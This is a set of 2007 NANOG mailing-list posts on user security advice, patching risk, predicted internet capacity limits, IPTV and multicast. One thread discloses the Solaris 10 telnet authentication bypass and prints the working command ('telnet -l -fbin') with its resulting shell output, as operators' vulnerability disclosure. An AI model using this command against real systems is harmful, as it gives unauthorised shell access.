Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
3. Even if your computer is secure, miscreants depend on your trust. Be suspicious of messages, files, software; even if it appears to come from a person or company you trust. Anti-spam, anti-spyware, anit-virus, anti-phishing tools can help. But don't assume because you are using them, you can click on everything and still be safe. The miscreants are always finding new ways around them. It may just be human nature, but people seem to engage in more risky behavior when they believe they are protected. 4. If your computer is compromised, unplug it until you can get it fixed. Its not going to fix itself, and ignoring the problem is just going to get worse. 5. Paying for AV software is not a solution, no matter how often it's been on TV. (Norton - the antivirus software one finds on virus-infected computers)
Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sun, Feb 11, 2007, Alexander Harrowell wrote: 5. Paying for AV software is not a solution, no matter how often it's been on TV. (Norton - the antivirus software one finds on virus-infected computers) Don't forget the trojan payload lately that used a cracked copy of Kaspersky AntiVirus to catch subsequent infecters. :) http://sunbeltblog.blogspot.com/2006/12/hacked-version-of-dr-web-antivirus.html Adrian
RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sat, 10 Feb 2007, Stasiniewicz, Adam wrote: Sean makes a good point, but there is one small problem with his suggestions. He is preaching to the choir. Just trying to get the choir to sing on key. Of course, I know the choir will probably spin off singing 18 different songs. Local interest. The next security incident, can the security experts in the US talk about what US readers can do. Experts in Europe talk about European readers can do. Experts in China, Australia, India, Brazil, Antarctica talk about what readers in those areas can do. I have no idea when, where or what the next incident will be, but can guess it will involve the usual problems. Turn on automatic update, turn off services you don't use, don't believe everything you read on the net.
Any NANOGers going to 3GSM World Congress?
For the mobile maniacs among us..if you're coming to Barcelona, and flying Iberia, BA or Lufthansa via Heathrow, beware that your aircraft will come in at Terminal A but your checked baggage will be sent to Terminal B. Do NOT pass through the doors to the baggage reclaim in Terminal A because you won't be able to get back through, and will have to pass through the security checkpoint in Terminal B Departures to recover your bags. This will be problematic for non-Spanish speakers and impossible for anyone who has thrown away their ticket stub. That is, of course, if any NANOG users actually *have* checked baggage.
Re: Question about SLAs
On 2/9/07, Steve Rubin [EMAIL PROTECTED] wrote: Does that mean you can take them to small claims court if they don't pay you the agreed SLA credits? Most contracts [in the U.S. today with largish to large corporations] have an arbitration clause ...though they shouldn't. Arbitration isn't, as far as I know, one of the official branches of government. I always find it rather contrary to logic that a contract, which is governed by the U.S. court system, can be written not to be covered by the U.S. court system. What an amazing loophole for corporate legal that is. (ObExperience: Every *forced* arbitration decision out of the 200+ I've researched has been in favor of the original contract writer -- the service provider and not its customer. The only arbitration settlements I've seen go the other way were only voluntarily moved to arbitration; one pretty major such settlement was made into a movie about a large energy company) -- -- Todd Vierling [EMAIL PROTECTED] [EMAIL PROTECTED] [EMAIL PROTECTED]
Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sat, 10 Feb 2007 23:36:32 -0600 Stasiniewicz, Adam [EMAIL PROTECTED] wrote: Another time I was do some consulting work for a NPO. I was going over the findings of my audit and I told the IT manager that all of his machines were missing patches. His response: we only install service packs, individual patches take too much time to install and tend to break more stuff than they fix. Ironically, a month latter he calls me back asking for help because his network got infect with Blaster... He was both right and wrong -- patches do break a lot of stuff. He was facing two problems: the probability of being off the air because of an attack versus the probability of being off the air because of bad interactions between patches and applications. Which is a bigger risk? It's not an easy question to answer. One scenario that scares me is what happens if the April Patch Tuesday takes out, say, TurboTax, just as Americans are getting ready to file their tax returns. There are no good answers to this question. Of course, being an academic I can view such problems as opportunities, and it is in fact a major focus of my research. Today, though, it's a serious issue for system managers. --Steve Bellovin, http://www.cs.columbia.edu/~smb
death of the net predicted by deloitte -- film at 11
(i'm guessing kc will be on the phone soon, to get from them their data?) ... A recent report from Deloitte said 2007 could be the year the internet approaches capacity, with demand outstripping supply. It predicted bottlenecks in some of the net's backbones as the amount of data overwhelms the size of the pipes. ... http://news.bbc.co.uk/2/hi/technology/6342063.stm
Re: death of the net predicted by deloitte -- film at 11
On Sun, 11 Feb 2007, Paul Vixie wrote: (i'm guessing kc will be on the phone soon, to get from them their data?) ... A recent report from Deloitte said 2007 could be the year the internet approaches capacity, with demand outstripping supply. It predicted bottlenecks in some of the net's backbones as the amount of data overwhelms the size of the pipes. because people can't get more pipe? perhaps next time the news folks could ask someone who runs a network what the problems are that face network operators? (or did I miss the hue and cry on nanog-l about full pipes and no more fiber to push traffic over? wasn't there in fact a hue and cry about a 1) fiber glut, 2) only 4% of all fiber actually lit?) -Chris still-waiting-for-the-rapture
Re: death of the net predicted by deloitte -- film at 11
On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote: perhaps next time the news folks could ask someone who runs a network what the problems are that face network operators? they did ask one, you must have missed this from the article: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... -b
Re: death of the net predicted by deloitte -- film at 11
-Chris, still-waiting-for-the-rapture, wrote as follows: (or did I miss the hue and cry on nanog-l about full pipes and no more fiber to push traffic over? wasn't there in fact a hue and cry about a 1) fiber glut, 2) only 4% of all fiber actually lit?) :-). however, you did seem to miss the hue and cry about how ALL YOUR BASE ARE BELONG TO GOOGLE now. a smattering of this can be found at: * http://www.internetoutsider.com/2006/04/how_much_dark_f.html * http://dondodge.typepad.com/the_next_big_thing/2005/11/google_data_cen.html now as to whether this is true, or whether it's a prevent-defense meant to strangle the redmond folks before the redmond folks know they needed fiber or whether google actually needs the capacity, or whether it's possible to lock up the market for more than couple of years, given that more capacity can be laid in once all the LRU's are signed... who the heck knows or cares? but hue there has been, and cry also, and measurement weenettes are likely banging their foreheads against their powerbook screens while they read our uninformed 4% estimates.
Re: death of the net predicted by deloitte -- film at 11
On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote: On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote: perhaps next time the news folks could ask someone who runs a network what the problems are that face network operators? they did ask one, you must have missed this from the article: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... isn't this a little like saying we are running out of voice capacity on the network because YellowPages can't find cheap paper to print their directories? surely they could have found a more relevant source. -- [ Jim Mercerjim@reptiles.org+971 50 436-3874 ] [ I want to live forever, or die trying.]
Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sat, 10 Feb 2007, Sean Donelan wrote: On Tue, 6 Feb 2007, Roy wrote: Its amazing how reporters has to butcher technology information to make it understood by their editors http://www.cnn.com/2007/TECH/internet/02/06/internet.attacks.ap/index.html?eref=rss_topstories Do we keep missing opportunities? Yes, it was a minor incident, just like a minor earthquake, the hurricane that doesn't hit, the fire that is exitinguished. But it was also an opportunity to get the message out to the public about the things they can do to take control. We remind people what to do in a tornado, earthquake, flood, hurricane, etc. This on-going education does help; even though some people still drive their cars through moving water or go outside to watch the tornado. Colin Powell mentioned at RSA in his extremely good, entertaining and pointless talk something of relevance. During the cold war American kids were trained to hide beneath their desktops in caseof a nuclear attack. Much good that would have done. Instead of pointing fingers at South Korea, China, etc, every country with compromised computers (all of them) are the problem. The United States may be slow as far as broadband, but it makes up for it in the number of compromised computers. We may know the drill, but it doesn't hurt to repeat message everytime we have the public's attention for 15 seconds. And yet, can a non-trained user understand what awareness means? 1. Turn on Automatic Update if your computer isn't managed by a full-time IT group. Microsoft Windows, Apple MAC OS/X, and several versions of Linux have Automatic Update available. Most vendors make security patches available to users whether or not the software is licensed or un-licensed. Zero day exploits may be sexy and get the press attention, but the long-term problem are the computers that never get patched. The VML exploit on the football stadium websites was patched last month; but its not how fast a patch is released, its how fast people install it. Amen. 0days have become something petrifying. At my talk at RSA on the subject of 0days and ZERT I started by asking what a 0day is. Any guesses as to how many answers I got? One Answer I did get was that we are all petrified as we can't do anything about it (not true) and won't know about it. I am of the strong belief one should take care of known vulnerabilities first, then start worrying about 0days. That's one thing anyone can start the process of doing (and for organizations, this can take years) which will also result in a better infrastructure to contain and respond to 0day attacks. Still, how many users know how to turn on automatic updates? We are likely to see them go to google, type in automatic updates and end up downloading malware. 2. Use a hardware firewall/router for your broadband connection and turn on the software firewall on your computer in case you ever move your computer to a different network. Use Wireless security (WEP, WPA, VPN, SSL, etc) if using a WiFi access point, or turn off the radio on both your home gateway and computer if you are not using WiFi. How?? This is where providers can chime in, and provide with pre-secured hardware to any level which is above come and rape me. 3. Even if your computer is secure, miscreants depend on your trust. Be suspicious of messages, files, software; even if it appears to come from a person or company you trust. How do I determine what is suspicious? This is a message telling me my mother is sick! Anti-spam, anti-spyware, anit-virus, anti-phishing tools can help. But don't assume because you are using them, you can click on everything and still be safe. The miscreants are always finding new ways around them. This is too complicated. I don't understand. So you give me a solution, use this and that tool, and then I need to be careful yet again? It may just be human nature, but people seem to engage in more risky behavior when they believe they are protected. The 4-bit encryption issue. I am encrypted and thus protected. I would argue email is simply not a secure medium by which to recieve files. Call and verify when in doubt. If approached by phone, email or any other medium, verify the source independently in an unrelated fashion to any instructions provided in that approach, before trusting it. 4. If your computer is compromised, unplug it until you can get it fixed. Its not going to fix itself, and ignoring the problem is just going to get worse. A user won't unplug him or herself. An ISP might. Today the economy of this changes enough for quite some ISPs to decide it is better to kick a user than give him or her tech support. Enter walled garden. Gadi.
RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sun, 11 Feb 2007, Sean Donelan wrote: On Sat, 10 Feb 2007, Stasiniewicz, Adam wrote: Sean makes a good point, but there is one small problem with his suggestions. He is preaching to the choir. Just trying to get the choir to sing on key. Of course, I know the choir will probably spin off singing 18 different songs. Local interest. The next security incident, can the security experts in the US talk about what US readers can do. Experts in Europe talk about European readers can do. Experts in China, Australia, India, Brazil, Antarctica talk about what readers in those areas can do. I have no idea when, where or what the next incident will be, but can guess it will involve the usual problems. Turn on automatic update, turn off services you don't use, don't believe everything you read on the net. Preaching to the choir indeed, only the choir is not the users. The Internet is not a secure place and we can force no one to secure their computers. We can throw them off our networks if they don't, as they cost us more than they pay. Gadi.
Re: death of the net predicted by deloitte -- film at 11
On Sun, 11 Feb 2007, Paul Vixie wrote: (i'm guessing kc will be on the phone soon, to get from them their data?) Any of us with any sense know the Internet could potentially die tomorrow morning. Any of us with any sense know it could be done in any number of ways, ranging from relatively few well aimed packets to a few thousand bots if used correctly, if not a few hundred if used amazingly well. Any of us with half a sense know that the Internet is not going to die tomorrow and that if it does, something will replace or more likely supplement it. But run out of tubes and trucks? Come on! Traffic jams are solved by bypasses and more lanes. :P ... A recent report from Deloitte said 2007 could be the year the internet approaches capacity, with demand outstripping supply. It predicted bottlenecks in some of the net's backbones as the amount of data overwhelms the size of the pipes. ... http://news.bbc.co.uk/2/hi/technology/6342063.stm
Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sun, 11 Feb 2007 10:49:30 -0600 Dave Pooser [EMAIL PROTECTED] wrote: He was both right and wrong -- patches do break a lot of stuff. He was facing two problems: the probability of being off the air because of an attack versus the probability of being off the air because of bad interactions between patches and applications. Which is a bigger risk? That's an argument for an organizational test environment and testing patches before deployment, no? Not an argument against patching. That said, I would LOVE to see MS ship a monthly/quarterly unified updater that's a one-step way to bring fresh systems up to date without slipstreaming the install CD. Then press a zillion of 'em and put them everywhere you can find an AOL CD, for all those folks on dial-up who see a 200MB download and curl up in the fetal position and whimper. Surveys have shown an inverse correlation between the size of a company and when it installed XP SP2. Yes, you're right; a good test environment is the right answer. As I think most of us on this list know, it's expensive, hard to do right, and still doesn't catch everything. If I recall correctly, the post I was replying to said that it was a non-profit; reading between the lines, it wasn't heavily staffed for IT, or they wouldn't have needed a consultant to help clean up after Blaster. And there's one more thing -- at what point have you done enough testing, given how rapidly some exploits are developed after the patch comes out? --Steve Bellovin, http://www.cs.columbia.edu/~smb
Re: death of the net predicted by deloitte -- film at 11
On Sun, 11 Feb 2007, Chris L. Morrow wrote: because people can't get more pipe? perhaps next time the news folks could ask someone who runs a network what the problems are that face network operators? (or did I miss the hue and cry on nanog-l about full pipes and no more fiber to push traffic over? wasn't there in fact a hue and cry about a 1) fiber glut, 2) only 4% of all fiber actually lit?) No no... you miss the point. If all lanes are used for the same traffic, no trucks can pass in the tubes! :) -Chris still-waiting-for-the-rapture
Re: death of the net predicted by deloitte -- film at 11
:-). however, you did seem to miss the hue and cry about how ALL YOUR BASE ARE BELONG TO GOOGLE now. a smattering of this can be found at: Has anyone considered that perhaps google is not looking at beating Microsoft but instead at beating TIVO, ABC, CBS, Warner Cable, etc? You can't possibly believe that there is enough bandwidth to stream High Def video to everyone, that's just not going to happen any time soon. However, as the file share networks have proven, it is possible to download that content in mass today with todays last mile. Download it over time to watch it when you want to, the internet version of TIVO. Thats where I think Google is headed with the dark fiber and massive storage containers. The fiber lets them get content to local points across the internet, like a great big fileshare network except with google in control so they can promise media producers that the material will be downloaded with commercials in the downloads. All you need is someone like Cisco to team with who can produce a network consumer DVD player capable of assuming the roll of a physical tivo box, say something like the kiss technology DP-600 box (cisco bought kiss last year) that the MPAA loves so much (MPAA bought thousands of them for their own purposes) and presto things are suddenly taking a whole new shape and direction. So now you get a choice, buy a new HD TV tuner or buy a new DVD player that does standard or HD tv even after the over the air broadcast change happens in the US. All your base indeed.. no hue required. George Roettger Netlink Services
Re: death of the net predicted by deloitte -- film at 11
On Sun, 11 Feb 2007, brett watson wrote: they did ask one, you must have missed this from the article: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... I forgot that new IP over POS over DNS over IP over POS backbone...
Re: death of the net predicted by deloitte -- film at 11
Has anyone considered that perhaps google is not looking at beating Microsoft but instead at beating TIVO, ABC, CBS, Warner Cable, etc? sure, but... You can't possibly believe that there is enough bandwidth to stream HD video to everyone, that's just not going to happen any time soon. ...wouldn't there be, if interdomain multicast existed and had a billing model that could lead to a compelling business model? right now, to the best of my knowledge, all large multicast flows are still intradomain. so if tivo and the others wanted to deliver all that crap using IP, would they do what broadcast.com did (lots of splitter/repeater stations), or do what google is presumably doing (lots of fiber), or would they put some capital and preorder into IDMR? All you need is someone like Cisco to team with who can produce a network consumer DVD player capable of assuming the roll of a physical tivo box, say something like the kiss technology DP-600 box (cisco bought kiss last year) that the MPAA loves so much (MPAA bought thousands of them for their own purposes) and presto things are suddenly taking a whole new shape and direction. yeah. sadly, that seems like the inevitable direction for the market leaders and disruptors. but i still wonder if a dark horse like IDMR can still emerge among the followers and incumbents (or the next-gen disruptors)? So now you get a choice, buy a new HD TV tuner or buy a new DVD player that does standard or HD tv even after the over the air broadcast change happens in the US. at some point tivo will disable my fast-forward button and i'll give up network TV altogether. irritatingly, hundreds of millions of others will not. but we digress.
Re: Every incident is an opportunity (was Re: Hackers hit key Internet
[EMAIL PROTECTED] (Sean Donelan) writes: ... don't believe everything you read on the net. you had me right up until that last part, which is completely unreasonable. -- Paul Vixie
RE: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
Yes, the place in question was very understaffed. The long term remediation plan I helped them on after the Blaster case was to deploy SUS and acquire a volume license for an AV (they had very spotty and in some sites nonexistent AV coverage on the client machines). With the pressure from upper management, I got the IT manager to do some basic tests of patches (manual install on the computers in the IT office and see if anything blew up) then push the patches via SUS. I have seen some fairly reasonable methodologies for deploying patches. In this day, being behind with patches (especially with Microsoft products) is like playing with fire. (That is not to say that it is a good idea to be behind on your *nix updates, they are just as vulnerable to exploit if they are running old versions of internet accessible apps.) Some of the strategies I have seen that work reasonably well at mitigating the risk of damage caused by patches: -Deploy patches to a small amount of computers (one or two per department). This way you get converge of all the apps used. Then after a day or two of no complaints, push patches out to the rest of the computers. -Maintain a collection of computers running all of the critical apps where you can test each patch on. -Wait a few days before patches. During this time monitor mailings lists/blogs/news sites/etc for any reports of problems, if none exist, patch. It should also be noted that over the last few years Microsoft has got a lot better at internally testing patches (remember the NT4 service packs?). So many times for my smaller and less staffed customers and private individuals I advise them to configure for automatic updating. Adam Stasiniewicz -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steven M. Bellovin Sent: Sunday, February 11, 2007 12:49 PM To: Dave Pooser Cc: nanog Subject: Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers) On Sun, 11 Feb 2007 10:49:30 -0600 Dave Pooser [EMAIL PROTECTED] wrote: He was both right and wrong -- patches do break a lot of stuff. He was facing two problems: the probability of being off the air because of an attack versus the probability of being off the air because of bad interactions between patches and applications. Which is a bigger risk? That's an argument for an organizational test environment and testing patches before deployment, no? Not an argument against patching. That said, I would LOVE to see MS ship a monthly/quarterly unified updater that's a one-step way to bring fresh systems up to date without slipstreaming the install CD. Then press a zillion of 'em and put them everywhere you can find an AOL CD, for all those folks on dial-up who see a 200MB download and curl up in the fetal position and whimper. Surveys have shown an inverse correlation between the size of a company and when it installed XP SP2. Yes, you're right; a good test environment is the right answer. As I think most of us on this list know, it's expensive, hard to do right, and still doesn't catch everything. If I recall correctly, the post I was replying to said that it was a non-profit; reading between the lines, it wasn't heavily staffed for IT, or they wouldn't have needed a consultant to help clean up after Blaster. And there's one more thing -- at what point have you done enough testing, given how rapidly some exploits are developed after the patch comes out? --Steve Bellovin, http://www.cs.columbia.edu/~smb
RE: death of the net predicted by deloitte -- film at 11
I didn't know verisign was a transit provider. Anyone use em? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of brett watson Sent: Sunday, February 11, 2007 10:15 AM To: nanog@merit.edu Subject: Re: death of the net predicted by deloitte -- film at 11 On Feb 11, 2007, at 10:58 AM, Chris L. Morrow wrote: perhaps next time the news folks could ask someone who runs a network what the problems are that face network operators? they did ask one, you must have missed this from the article: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... -b
RE: death of the net predicted by deloitte -- film at 11
My CIO is convinced that Google is going to take over the internet and everyone will pay google for access. He also believes that google will release their own protocol some sort of Google IP which everyone will have to pay for also. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Vixie Sent: Sunday, February 11, 2007 10:27 AM To: nanog@merit.edu Subject: Re: death of the net predicted by deloitte -- film at 11 -Chris, still-waiting-for-the-rapture, wrote as follows: (or did I miss the hue and cry on nanog-l about full pipes and no more fiber to push traffic over? wasn't there in fact a hue and cry about a 1) fiber glut, 2) only 4% of all fiber actually lit?) :-). however, you did seem to miss the hue and cry about how ALL YOUR BASE ARE BELONG TO GOOGLE now. a smattering of this can be found at: * http://www.internetoutsider.com/2006/04/how_much_dark_f.html * http://dondodge.typepad.com/the_next_big_thing/2005/11/google_ data_cen.html now as to whether this is true, or whether it's a prevent-defense meant to strangle the redmond folks before the redmond folks know they needed fiber or whether google actually needs the capacity, or whether it's possible to lock up the market for more than couple of years, given that more capacity can be laid in once all the LRU's are signed... who the heck knows or cares? but hue there has been, and cry also, and measurement weenettes are likely banging their foreheads against their powerbook screens while they read our uninformed 4% estimates.
Re: death of the net predicted by deloitte -- film at 11
On Sun, Feb 11, 2007 at 02:39:04PM -0800, Joseph Jackson wrote: My CIO is convinced that Google is going to take over the internet and everyone will pay google for access. He also believes that google will release their own protocol some sort of Google IP which everyone will have to pay for also. Sounds great. We won't all have to move to IPv6 after all! - mark :-) -- Mark Newton Email: [EMAIL PROTECTED] (W) Network Engineer Email: [EMAIL PROTECTED] (H) Internode Systems Pty Ltd Desk: +61-8-82282999 Network Man - Anagram of Mark Newton Mobile: +61-416-202-223
Re: Every incident is an opportunity (was Re: Hackers hit key Internet
On 11 Feb 2007, Paul Vixie wrote: [EMAIL PROTECTED] (Sean Donelan) writes: ... don't believe everything you read on the net. you had me right up until that last part, which is completely unreasonable. I think it's not only reasonable, but is the only sane way to approach content on the net. Why do you feel it's unreasonable? Or are you being sarcastic? (It's impossible to tell) -- Steve Sobol, Professional Geek ** Java/VB/VC/PHP/Perl ** Linux/*BSD/Windows Victorville, California PGP:0xE3AE35ED It's all fun and games until someone starts a bonfire in the living room.
RE: death of the net predicted by deloitte -- film at 11
On Sun, 11 Feb 2007, Joseph Jackson wrote: My CIO is convinced that Google is going to take over the internet and everyone will pay google for access. He also believes that google will release their own protocol some sort of Google IP which everyone will have to pay for also. You mean like one well known company that tries to make sure everyone pays for most common programs everyone needs when they buy a computer? (you know it did not used to be like that 10 years ago...) As for google, I'd not expect them to charge but new protocol with the following structure will be right their alley: - destination address- (there is no need for source address since everything comes from google) -data you asked for- - data you did not ask for - (google advertisement space) :) -- William Leibzon Elan Networks [EMAIL PROTECTED]
Re: Every incident is an opportunity (was Re: Hackers hit key Internet
... don't believe everything you read on the net. you had me right up until that last part, which is completely unreasonable. I think it's not only reasonable, but is the only sane way to approach content on the net. Why do you feel it's unreasonable? Or are you being sarcastic? (It's impossible to tell) i mean it's never going to happen, and is therefore totally unrealistic, and that any plan with that as a required element is doomed at the outset, and we had better figure out alternative plans. you might just as well ask for rivers to flow backwards, or dogs and cats to live together in harmony, or an educated american electorate, as to ask that folks stop believing everything they read on the net | see on tv | etc. are we off-topic yet?
Re: death of the net predicted by deloitte -- film at 11
On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... IP over domain name registration? -- David W. HankinsIf you don't do it right the first time, Software Engineer you'll just have to do it again. Internet Systems Consortium, Inc. -- Jack T. Hankins
Re: death of the net predicted by deloitte -- film at 11
do what google is presumably doing (lots of fiber), or would they put some capital and preorder into IDMR? IDMR is great if you're a broadcaster or a backbone, but how does it help the last 2 miles, the phoneco ATM network or the ISP network where you have 10k different users watching 10k different channels? I'm not sure if it would help with a multinode replication network like what google is probably up to either (which explains why they want dedicated bandwidth, internode replication solves the backup problems as well). Also forgetting that bandwidth issue for a moment, where is the draw that makes IPTV better than cable or satellite? I mean come on guys, if the world had started out with IPTV live broadcasts over the internet and then someone developed cable, satellite, or over the air broadcasting, any of those would have been considered an improvement. IPTV needs something the others don't have and a simple advantage is that of an archive instead of broadcast medium. The model has to be different from the broadcast model or it's never going to fly. TIVO type setup with a massive archive of every show so you can not only watch this weeks episode but you can tivo download any show from the last 6 years worth of your favorite series is one heck of a draw over cable or satellite and might be enough to motivate the public to move to a different service. A better tivo than tivo. As for making money, just stick a commercial on the front of every download. How many movies are claimed downloaded on the fileshare networks every week? Geo.
Re: death of the net predicted by deloitte -- film at 11
I believe that the element that has been missing in this discussion thus far has been the source (content) players, and where they are hiding. CDNs, a la Akamai, Limelight, etc., will take up some of the slack and mitigate much of the backbone burden where legitimate ISPs are concerned, as will hierarchical caching for the newbie carriers-that-came-to-be-called ISPs -i.e., the MSOs and Telcos. Playing the Pareto, the higher the demand (95/5) for a title, the closer it will be stored to the user community, and the longer the tail (5/95) of a title, the farther its storage from the user community. My point is, CDNs and hierarchical cache must be inserted into the calculus, because one, they are already being used, and two, their use will only increase with time, fwiw. Frank ps - I've had some issues with my email editor of late. If anyone notices any artifacts or extraneous characters in the delivery of this message, kindly email me off list and I shall be indebted to you, tia. On Sun Feb 11 19:22 , Geo. sent: do what google is presumably doing (lots of fiber), or would they put some capital and preorder into IDMR? IDMR is great if you're a broadcaster or a backbone, but how does it help the last 2 miles, the phoneco ATM network or the ISP network where you have 10k different users watching 10k different channels? I'm not sure if it would help with a multinode replication network like what google is probably up to either (which explains why they want dedicated bandwidth, internode replication solves the backup problems as well). Also forgetting that bandwidth issue for a moment, where is the draw that makes IPTV better than cable or satellite? I mean come on guys, if the world had started out with IPTV live broadcasts over the internet and then someone developed cable, satellite, or over the air broadcasting, any of those would have been considered an improvement. IPTV needs something the others don't have and a simple advantage is that of an archive instead of broadcast medium. The model has to be different from the broadcast model or it's never going to fly. TIVO type setup with a massive archive of every show so you can not only watch this weeks episode but you can tivo download any show from the last 6 years worth of your favorite series is one heck of a draw over cable or satellite and might be enough to motivate the public to move to a different service. A better tivo than tivo. As for making money, just stick a commercial on the front of every download. How many movies are claimed downloaded on the fileshare networks every week? Geo.
Re: death of the net predicted by deloitte -- film at 11
On Mon, 12 Feb 2007, David W. Hankins wrote: On Sun, Feb 11, 2007 at 11:14:49AM -0700, brett watson wrote: Verisign, the American firm which provides the backbone for much of the net, including domain names .com and .net,... IP over domain name registration? We already had Video over DNS. Why not?
Solaris 10 Telnet Exploit
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html Tested on Sol10, and it indeed works... Good thing we use SSH, right?! iWil:~ wschultz$ telnet -l -fbin dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $
Re: death of the net predicted by deloitte -- film at 11
Thus spake Daniel Senie [EMAIL PROTECTED] At 02:57 PM 2/11/2007, Paul Vixie wrote: ...wouldn't there be, if interdomain multicast existed and had a billing model that could lead to a compelling business model? right now, to the best of my knowledge, all large multicast flows are still intradomain. IP Multicast as a solution to video distribution is a non-starter. IP Multicast for the wide area is a failure. It assumes large numbers of people will watch the same content at the same time. The usage model that could work for it most mimics the broadcast environment before cable TV, when there were anywhere from three to ten channels to choose from, and everyone watched one of those. That model has not made sense in a long time. The proponents of IP Multicast seem to have failed to notice this. IPmc would be useful for sports, news, and other live events. Think about how many people sit around their TVs staring at such things; it's probably a significant fraction of all TV-watching time. Better yet, folks who want to watch particular sports games will be concentrated in the two cities that are playing (i.e. high fanout at the bottom of the tree), which multicast delivery excels at compared to unicast. For non-live content, even if one assumes people want their next episode of 24 on demand, wouldn't it make more sense to multicast it to STBs that are set to record it (or that predict their owners will want to see it), vs. using P2P or direct download? That'll save you gobs and gobs of bandwidth _immediately following the new program's release_. After that majority of viewers get their copy, you can transition the program to another system (e.g. P2P) that is more amenable to on-demand downloading of old content. Of course, this is a pointless discussion since residential multicast is virtually non-existent today, and there's no sign of it being imminent. Anyone want to take bets on whether IPmc or IPv6 shows up first? ;-) S Stephen Sprunk God does not play dice. --Albert Einstein CCIE #3723 God is an inveterate gambler, and He throws the K5SSSdice at every possible opportunity. --Stephen Hawking
Re: Solaris 10 Telnet Exploit
On Sun, 11 Feb 2007, William Schultz wrote: http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html Tested on Sol10, and it indeed works... Good thing we use SSH, right?! It works. Credit to Johannes Ullrich at the SANS ISC. I believe the vulnerability is that it is running telnet bu default. iWil:~ wschultz$ telnet -l -fbin dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $
Re: Solaris 10 Telnet Exploit
From HD Moore: but this bug isnt -froot, its -fanythingbutroot =P On Sun, 11 Feb 2007, William Schultz wrote: http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html Tested on Sol10, and it indeed works... Good thing we use SSH, right?! iWil:~ wschultz$ telnet -l -fbin dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $
Re: death of the net predicted by deloitte -- film at 11
Owen DeLong wrote: Today IPTV is in its infancy and is strictly a novelty for early adopters. As the technology matures and as the market develops an understanding of the possibilities creating pressure on manufacturers and content providers to offer better, it will gradually become compelling. In case you missed it something we're doing over here... http://uctv.canberra.edu.au/ We have HDTV and quiet a list of channels on campus. Of course licensing/broadcast restrictions (read: lawyers) have a lot stopped at the border, but hey, it's working ;-) Regards, Mat
Re: death of the net predicted by deloitte -- film at 11
[EMAIL PROTECTED] (Geo.) writes: IDMR is great if you're a broadcaster or a backbone, but how does it help the last 2 miles, the phoneco ATM network or the ISP network where you have 10k different users watching 10k different channels? http://tools.ietf.org/html/draft-ietf-mboned-auto-multicast-00 is what i expect. note: i've drunk that koolaid am helping on the distribution side. -- Paul Vixie
Re: Every incident is an opportunity (was Re: Hackers hit key Internet traffic computers)
On Sun, 11 Feb 2007, Gadi Evron wrote: Colin Powell mentioned at RSA in his extremely good, entertaining and pointless talk something of relevance. During the cold war American kids were trained to hide beneath their desktops in caseof a nuclear attack. Much good that would have done. The important lesson is you can educate people. The content may have been bogus, but it was very effective at reaching most of the population. People who grew up during that era still remember it. If you can come up with a few simple things to do, it is possible to reach most of the public. But we are our own worst enemies. When we have the opportunity, instead of giving the few simple things everyone could do, we create a lot of confusion.